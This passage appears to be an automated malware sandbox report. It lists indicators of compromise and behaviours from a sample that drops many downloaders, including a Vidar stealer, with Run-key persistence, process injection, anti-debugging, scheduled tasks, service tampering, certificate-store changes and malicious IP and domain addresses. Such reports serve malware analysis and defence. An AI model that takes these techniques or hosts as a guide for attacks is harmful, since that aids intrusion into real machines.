\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_1c30d01c78ea41729748138c80a20b63 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
http154.216.19.160txtUm9L61WgOApLFKJ.exe.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 69 bitbucket.org 244 pastebin.com 245 pastebin.com 22 raw.githubusercontent.com 23 raw.githubusercontent.com 68 bitbucket.org -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 111 checkip.dyndns.org 181 checkip.dyndns.org 51 api.ipify.org -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 1728 powercfg.exe 2576 powercfg.exe 2616 powercfg.exe 712 powercfg.exe 4436 powercfg.exe 2520 powercfg.exe 1696 powercfg.exe 5080 powercfg.exe -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/files/0x000b000000023b88-518.dat autoit_exe behavioral2/files/0x0009000000023bcb-608.dat autoit_exe behavioral2/files/0x0016000000023c3a-636.dat autoit_exe behavioral2/files/0x0009000000023c50-650.dat autoit_exe -
Drops file in System32 directory 5 IoCs
Processes:
http103.130.147.211Filesjgt.exe.exepowershell.exeupdater.exepowershell.EXEdescription ioc Process File opened for modification C:\Windows\system32\MRT.exe http103.130.147.211Filesjgt.exe.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
http185.215.113.2058080markdef.exe.exehttp185.215.113.103offrandom.exe.exehttp185.215.113.103offdef.exe.exehttp185.215.113.100offdef.exe.exehttp185.215.113.100offrandom.exe.exepid Process 916 http185.215.113.2058080markdef.exe.exe 8 http185.215.113.103offrandom.exe.exe 1036 http185.215.113.103offdef.exe.exe 3488 http185.215.113.100offdef.exe.exe 2408 http185.215.113.100offrandom.exe.exe -
Suspicious use of SetThreadContext 14 IoCs
Processes:
httpproxy.siteterbaru.xyzcss0a839761915d.exe.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exehttpeficienciaeningenieria.com.mxvnklng5th.exe.exehttpeficienciaeningenieria.com.mxngqwplngown.exe.exehttpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exehttpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exehttp103.130.147.211Filesjgt.exe.exeupdater.exepowershell.EXEdescription pid Process procid_target PID 3316 set thread context of 1528 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 95 PID 880 set thread context of 4520 880 http87.120.84.38txttIelklVKfumqUfa.exe.exe 130 PID 4444 set thread context of 3196 4444 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe 133 PID 3500 set thread context of 3012 3500 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe 137 PID 4296 set thread context of 688 4296 httpeficienciaeningenieria.com.mxvnklng5th.exe.exe 147 PID 4056 set thread context of 4188 4056 httpeficienciaeningenieria.com.mxngqwplngown.exe.exe 156 PID 4340 set thread context of 2004 4340 httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe 157 PID 4392 set thread context of 4752 4392 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe 169 PID 4324 set thread context of 2652 4324 httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe 186 PID 3940 set thread context of 3608 3940 http103.130.147.211Filesjgt.exe.exe 222 PID 4820 set thread context of 2888 4820 updater.exe 258 PID 4820 set thread context of 4152 4820 updater.exe 259 PID 4820 set thread context of 4932 4820 updater.exe 264 PID 3644 set thread context of 396 3644 powershell.EXE 268 -
Processes:
resource yara_rule behavioral2/files/0x0008000000023bfd-907.dat upx -
Drops file in Program Files directory 2 IoCs
Processes:
http154.216.19.160txtUm9L61WgOApLFKJ.exe.exedescription ioc Process File created C:\Program Files (x86)\DHCP Host\dhcphost.exe http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe File opened for modification C:\Program Files (x86)\DHCP Host\dhcphost.exe http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe -
Drops file in Windows directory 2 IoCs
Processes:
http185.215.113.66newtpp.exe.exedescription ioc Process File created C:\Windows\sysppvrdnvs.exe http185.215.113.66newtpp.exe.exe File opened for modification C:\Windows\sysppvrdnvs.exe http185.215.113.66newtpp.exe.exe -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 1424 sc.exe 1116 sc.exe 4176 sc.exe 2944 sc.exe 1696 sc.exe 848 sc.exe 4368 sc.exe 1824 sc.exe 3708 sc.exe 1844 sc.exe 1072 sc.exe 1568 sc.exe 832 sc.exe 180 sc.exe 4384 sc.exe 1660 sc.exe 1276 sc.exe 5048 sc.exe 5008 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target Process procid_target 3040 3316 WerFault.exe 94 4232 4340 WerFault.exe 155 -
System Location Discovery: System Language Discovery 1 TTPs 59 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exehttp46.8.229.59thebiggetlab.exe.exejsc.exeservice123.exepowershell.exehttp87.120.84.38txttIelklVKfumqUfa.exe.execmd.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exeMSBuild.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exeRegSvcs.execmd.exeis-A504O.tmphttp185.215.113.66newtpp.exe.exesc.exehttp185.215.113.100offrandom.exe.exehttpeficienciaeningenieria.com.mxngqwplngown.exe.exehttpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exeschtasks.exeMSBuild.exehttp185.215.113.66pei.exe.exesc.exeInformationCheck.exehttp185.215.113.2058080markdef.exe.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exepowershell.exehttp185.215.113.26JavUmar.exe.exehttpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exejsc.exeschtasks.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exehttpproxy.siteterbaru.xyzcss0a839761915d.exe.exehttp185.215.113.103offrandom.exe.exeRegSvcs.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exehttpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exesysppvrdnvs.exehttp185.215.113.100offdef.exe.exesc.exehttp185.215.113.103offdef.exe.exetimeout.exesc.exehttpeficienciaeningenieria.com.mxvnklng5th.exe.exepowershell.exeUUSIService.exesc.exepowershell.exeschtasks.exemiddlemediaplayer32.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp154.12.82.11808win.exe.exeInformationCheck.exe1240923462.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exeEdgeUpdaters.exe1677919094.exepowershell.exeRegSvcs.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http46.8.229.59thebiggetlab.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http87.120.84.38txttIelklVKfumqUfa.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http87.120.84.38txttIelklVKfumqUfa.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-A504O.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.66newtpp.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.100offrandom.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpeficienciaeningenieria.com.mxngqwplngown.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.66pei.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InformationCheck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.2058080markdef.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.26JavUmar.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.103offrandom.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.100offdef.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http185.215.113.103offdef.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language httpeficienciaeningenieria.com.mxvnklng5th.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UUSIService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language middlemediaplayer32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http154.12.82.11808win.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InformationCheck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1240923462.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EdgeUpdaters.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1677919094.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MSBuild.exehttp185.215.113.26JavUmar.exe.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 http185.215.113.26JavUmar.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString http185.215.113.26JavUmar.exe.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 60 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 211 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exedialer.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 1192 schtasks.exe 4176 schtasks.exe 3212 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
UUSIService.exeEdgeUpdaters.exepowershell.exehttp146.70.24.213do1654365431.exe.exehttp185.215.113.2058080markdef.exe.exepowershell.exepowershell.exepowershell.exepid Process 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 968 powershell.exe 968 powershell.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 4400 http146.70.24.213do1654365431.exe.exe 4400 http146.70.24.213do1654365431.exe.exe 2556 EdgeUpdaters.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 916 http185.215.113.2058080markdef.exe.exe 916 http185.215.113.2058080markdef.exe.exe 5104 powershell.exe 5104 powershell.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 5104 powershell.exe 2836 powershell.exe 2836 powershell.exe 2836 powershell.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 4164 powershell.exe 4164 powershell.exe 4164 powershell.exe 916 http185.215.113.2058080markdef.exe.exe 916 http185.215.113.2058080markdef.exe.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 544 UUSIService.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
http154.216.19.160txtUm9L61WgOApLFKJ.exe.exepid Process 3196 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
httpeficienciaeningenieria.com.mxvnklng5th.exe.exehttpeficienciaeningenieria.com.mxngqwplngown.exe.exehttpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exepid Process 4296 httpeficienciaeningenieria.com.mxvnklng5th.exe.exe 4056 httpeficienciaeningenieria.com.mxngqwplngown.exe.exe 4340 httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exeUUSIService.exeEdgeUpdaters.exepowershell.exehttp146.70.24.213do1654365431.exe.exepowershell.exepowershell.exepowershell.exehttp185.215.113.2058080markdef.exe.exehttp185.215.113.103offrandom.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exepowershell.exepowershell.exepowershell.exehttp185.215.113.103offdef.exe.exehttp185.215.113.100offdef.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp185.215.113.100offrandom.exe.exeRegSvcs.exepowershell.exeRegSvcs.exeRegSvcs.exepowershell.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exepowershell.exehttpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe1372228982.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exepowercfg.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEdllhost.exesvchost.exedescription pid Process Token: SeDebugPrivilege 4528 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe Token: SeDebugPrivilege 544 UUSIService.exe Token: SeDebugPrivilege 2556 EdgeUpdaters.exe Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 4400 http146.70.24.213do1654365431.exe.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeDebugPrivilege 916 http185.215.113.2058080markdef.exe.exe Token: SeDebugPrivilege 8 http185.215.113.103offrandom.exe.exe Token: SeDebugPrivilege 4444 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe Token: SeDebugPrivilege 4520 http87.120.84.38txttIelklVKfumqUfa.exe.exe Token: SeDebugPrivilege 3012 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 1036 http185.215.113.103offdef.exe.exe Token: SeDebugPrivilege 3488 http185.215.113.100offdef.exe.exe Token: SeDebugPrivilege 3196 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe Token: SeDebugPrivilege 2408 http185.215.113.100offrandom.exe.exe Token: SeDebugPrivilege 688 RegSvcs.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 4188 RegSvcs.exe Token: SeDebugPrivilege 2004 RegSvcs.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 4752 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 4324 httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe Token: SeDebugPrivilege 4432 1372228982.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeShutdownPrivilege 712 powercfg.exe Token: SeCreatePagefilePrivilege 712 powercfg.exe Token: SeShutdownPrivilege 4436 powercfg.exe Token: SeCreatePagefilePrivilege 4436 powercfg.exe Token: SeShutdownPrivilege 2616 powercfg.exe Token: SeCreatePagefilePrivilege 2616 powercfg.exe Token: SeShutdownPrivilege 2576 powercfg.exe Token: SeCreatePagefilePrivilege 2576 powercfg.exe Token: SeDebugPrivilege 3644 powershell.EXE Token: SeDebugPrivilege 3588 powershell.exe Token: SeShutdownPrivilege 1696 powercfg.exe Token: SeCreatePagefilePrivilege 1696 powercfg.exe Token: SeLockMemoryPrivilege 4932 dialer.exe Token: SeShutdownPrivilege 1728 powercfg.exe Token: SeCreatePagefilePrivilege 1728 powercfg.exe Token: SeShutdownPrivilege 2520 powercfg.exe Token: SeCreatePagefilePrivilege 2520 powercfg.exe Token: SeShutdownPrivilege 5080 powercfg.exe Token: SeCreatePagefilePrivilege 5080 powercfg.exe Token: SeDebugPrivilege 3516 powershell.EXE 